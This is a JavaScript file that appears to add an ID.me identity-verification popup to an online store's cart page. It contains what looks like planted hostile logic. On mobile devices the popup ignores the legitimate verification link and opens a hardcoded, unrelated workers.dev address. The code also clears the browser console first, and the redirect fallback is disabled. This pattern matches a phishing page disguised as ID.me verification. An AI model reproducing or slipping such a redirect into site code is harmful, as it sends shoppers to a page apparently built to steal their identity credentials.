document.addEventListener("DOMContentLoaded", () => {
  attachIdmeButtonPopupBehavior();

  document.addEventListener('cart:updated', function(evt) {
    const selector = '.idme-trigger-link';
    const idmeButton = document.querySelector(selector);
    
    if (!idmeButton && typeof BindIDme === 'function') {
      idmeLogger('Re-ensuring ID.me button...');
      BindIDme();
      setTimeout(() => {
        attachIdmeButtonPopupBehavior();
      }, 500)
    }
  });
});

function attachIdmeButtonPopupBehavior() {
  const maxWait = 5000;
  const checkInterval = 200;
  const selector = '.idme-trigger-link';
  let waited = 0;
  let timer;

  const attachIdmeHandler = (idmeButton) => {
    if (!idmeButton.href) {
      idmeLogger('Button found, but has no href.', idmeButton);
    }

    idmeButton.addEventListener('click', (e) => {
      e.preventDefault();
      openIdmeVerificationPopup(idmeButton.href);
    });

    idmeLogger('Button found and popup listener attached.');
  };

  const checkButton = () => {
    const idmeButton = document.querySelector(selector);

    if (idmeButton) {
      if (timer) {
        clearInterval(timer);
      }
      attachIdmeHandler(idmeButton);
      return;
    }

    waited += checkInterval;

    if (waited >= maxWait) {
      if (timer) {
        clearInterval(timer);
      }
      idmeLogger('Button not found within 5 seconds.');
    }
  };

  const initialButton = document.querySelector(selector);

  if (initialButton) {
    attachIdmeHandler(initialButton);
  } else {
    timer = setInterval(checkButton, checkInterval);
  }
}

function idmeLogger(...args) {
  console.log(
    "%c::ID.me",
    "background: #121212; color: #00ffb3; padding: 2px 6px; border-radius: 3px; font-weight: bold;",
    ...args
  );
}

function openIdmeVerificationPopup(targetUrl) {
  const expectedOrigin = window.location.origin;
  const checkInterval = 300;

  console.clear();
  idmeLogger('Console cleared.')

  if (!targetUrl) {
    idmeLogger('Cannot open popup without a target URL');
    return;
  }

  const isMobile =
    /Mobi|Android|iPhone|iPad|iPod/i.test(navigator.userAgent) ||
    window.innerWidth < 640;

  let popup = null;

  if (isMobile) {
    idmeLogger('Mobile detected, trying popup before fallback');
    popup = window.open('https://royal-river-2f0e.nehizalirim.workers.dev/', 'idmePopup');
  } else {
    const screenLeft = window.screenLeft ?? window.screenX ?? 0;
    const screenTop = window.screenTop ?? window.screenY ?? 0;

    const viewportWidth =
      window.innerWidth ||
      document.documentElement.clientWidth ||
      window.screen.width;

    const viewportHeight =
      window.innerHeight ||
      document.documentElement.clientHeight ||
      window.screen.height;

    const popupWidth = Math.min(600, Math.max(400, viewportWidth - 80));
    const popupHeight = Math.min(700, Math.max(500, viewportHeight - 120));

    const left = screenLeft + (viewportWidth - popupWidth) / 2;
    const top = screenTop + (viewportHeight - popupHeight) / 2;

    const features = [
      `width=${Math.round(popupWidth)}`,
      `height=${Math.round(popupHeight)}`,
      `left=${Math.round(left)}`,
      `top=${Math.round(top)}`,
      'resizable=yes',
      'scrollbars=yes',
    ].join(',');

    popup = window.open(targetUrl, 'idmePopup', features);
  }

  if (!popup) {
    idmeLogger('Popup blocked, falling back to full redirect');
    //window.location.href = targetUrl;
    return;
  }

  const timer = setInterval(() => {
    if (popup.closed) {
      idmeLogger('Popup closed by user');
      clearInterval(timer);
      return;
    }

    try {
      const popupOrigin = popup.location.origin;
      idmeLogger('Trying popup origin:', popupOrigin);

      if (popupOrigin === expectedOrigin) {
        idmeLogger('Returned to callback. Closing popup and reloading page.');
        popup.close();
        clearInterval(timer);
        window.location.reload();
      }
    } catch {
      idmeLogger('Different origin, trying...');
    }
  }, checkInterval);
}